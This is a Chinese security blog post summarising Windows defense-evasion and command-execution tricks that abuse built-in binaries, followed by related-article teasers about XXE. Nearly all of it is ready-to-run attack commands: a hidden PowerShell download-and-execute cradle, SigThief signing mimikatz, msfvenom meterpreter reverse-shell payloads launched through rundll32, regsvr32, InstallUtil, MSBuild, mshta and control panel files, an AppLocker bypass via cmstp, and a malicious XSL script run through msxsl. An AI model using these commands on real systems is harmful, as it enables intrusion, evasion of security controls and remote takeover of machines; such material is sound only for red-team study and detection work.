<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    windows命令執行防御規避總結

    VSole2021-12-09 07:26:11

    powershell

    powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8888/logo.gif'))\"" /f
    

    SIP

    通過sip劫持對惡意代碼簽名獲得系統信任https://github.com/secretsquirrel/SigThief

    python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe
    

    rundll32.exe

    生成
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll >xxx.dll
    
    目標執行
    rundll32.exe shell32.dll,Control_RunDLL xxx.dll
    

    Regsvr32.exe

    msfconsole
    
    auxiliary/server/regsvr32_command_delivery_server
    set CMD net user test 123456 /add
    
    目標執行
    regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll
    
    

    InstallUtil.exe

    1.編譯后門:
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319>csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:"C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk" xxx.cs
    2.靶機上運行:
    InstallUtil.exe /U xxx.exe
    3.msf監聽,得到反彈的shell:
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST xx.xx.xx.xx
    set LPORT 4444
    exploit
    
    

    Msbuild.exe

    MSBuild是Microsoft Build Engine的縮寫,代表Microsoft和Visual Studio的新的生成平臺,MSBuild可編譯特定格式的xml文件

    https://github.com/3gstudent/msbuild-inline-task

    msf生成shellcode

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444
    -f csharp
    

    使用shellcode替換 https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml 中的shellcode部分

    msf監聽

    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set lhost xx.xx.xx.xx
    set lport 4444
    exploit
    

    運行

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml
    

    CMSTP

    cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt繞過AppLocker并啟動惡意腳本
    

    Mshta.exe

    Mshta.exe 是一個執行 Microsoft HTML 應用程序 (HTA) 的實用程序,攻擊者可以使用 mshta.exe 通過受信任的 Windows 實用程序代理執行惡意代碼

    use exploit/windows/misc/hta_server
    msf exploit(windows/misc/hta_server) > set srvhost xx.xx.xx.xx
    msf exploit(windows/misc/hta_server) > exploit
    mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta
    

    控制面板

    攻擊者可以使用控制面板項作為有效載荷來執行任意命令,控制面板項是注冊的可執行文件(.exe)或控制面板(.cpl)文件,可以直接從命令行執行或通過Control_RunDLL(API)調用或者直接雙擊文件。
    攻擊者構造惡意的dll文件CPIApplet.dll
    利用msf生成dll文件:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll > /tmp/CPIApplet.dll
    傳入windows機器,然后重命名為CPIApplet.cpl,通過control.exe c:\users\administrator\desktop\CPIApplet.cpl 執行命令
    
    

    通過msxsl.exe調用惡意xml文件執行腳本

    制作兩個文件

    customers.xml

    <?xml version="1.0"?>
    <?xml-stylesheet type="text/xsl" href="script.xsl" ?>
    <customers>
    <customer>
    <name>Microsoft</name>
    </customer>
    </customers>
    

    script.xsl

    <?xml version='1.0'?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">
    <msxsl:script language="JScript" implements-prefix="user">
    function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k calc.exe");
    return nodelist.nextNode().xml;
    }
    </msxsl:script>
    <xsl:template match="/">
    <xsl:value-of select="user:xml(.)"/>
    </xsl:template>
    </xsl:stylesheet>
    

    開啟http服務

    python3 -m http.server 80
    

    遠程下載執行

    msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl
    
    xml語言xx
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    近日,國家信息安全漏洞庫(CNNVD)收到關于微信支付SDK XXE(XML External Entity)漏洞(CNNVD-201807-083)情況的報送。成功利用該漏洞的攻擊者可以遠程讀取服務器文件,獲取商戶服務器上的隱私數據,甚至可以支付任意金額購買商品。
    Web Service滲透測試總結
    XXE如何理解? 它是可擴展標記語言 ( XML) 用于存儲和傳輸數據。 通常始于異步JavaScript和XML技術(ajax技術):網頁應用能夠快速地將增量更新呈現在用戶界面上,而不需要重載(刷新)整個頁面。 目前JSON的使用比XML更加普遍JSON和XML都被用于在Ajax模型中的XML技術
    淺析xml之xinclude & xslt
    2022-05-19 08:17:00
    最近依舊在研究xml及其相關安全問題,前一篇文章已經提及了較為大眾且CTF中常見的xml攻擊方式。
    2017 OWASP十大關鍵Web應用安全風險簡析 受越來越短的軟件項目生命周期影響,有些應用面臨損及金融、醫療、零售業和其他行業數字安全的風險。開發人員和經理必須了解這些最常見的風險,才能保護自己的應用。為此,開放網頁應用安全計劃(OWASP)定期發布十大最關鍵Web應用安全風險。 該計劃從專精應用安全的公司企業收集40多份數據,數據涵蓋數百家公司處收集的漏洞信息,涉及10萬個應用和API。 O
    但是,在處理外部實體時,可以針對應用程序啟動許多攻擊。這些攻擊包括泄露本地系統文件,這些文件可能包含密碼和私人用戶數據等敏感數據,或利用各種方案的網絡訪問功能來操縱內部應用程序。通過將這些攻擊與其他實現缺陷相結合,這些攻擊的范圍可以擴展到客戶端內存損壞,任意代碼執行,甚至服務中斷,具體取決于這些攻擊的上下文。//這一行是 XML 文檔定義
    --第一行是XML聲明-->. --這是XML處理指令的例子。后的第一個單詞是處理指令名,在本例中是xml-->. --處理指令一定要頂格寫,前面不能有任何空白-->. XML文檔必須有且只有一個根元素。version特性表明這個文檔符合XML 1.0規范。0x02:實體實體叫ENTITY,實體的作用是避免重復輸入。0x03:處理指令PI處理指令用于XML解析器傳遞信息到應用程序。這些文本將被解析器檢查實體以及標記。
    XML外部實體注入
    2022-07-28 22:32:56
    0x01:簡單了解XMLXML 指可擴展標記語言XML的特點及作用:特點:1. xml與操作系統、編程語言的開發平臺都無關
    對于xxe漏洞的認識一直都不是很清楚,而在我為期不長的挖洞生涯中也沒有遇到過,所以就想著總結一下,撰寫此文以作為記錄,加深自己對xxe漏洞的認識。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类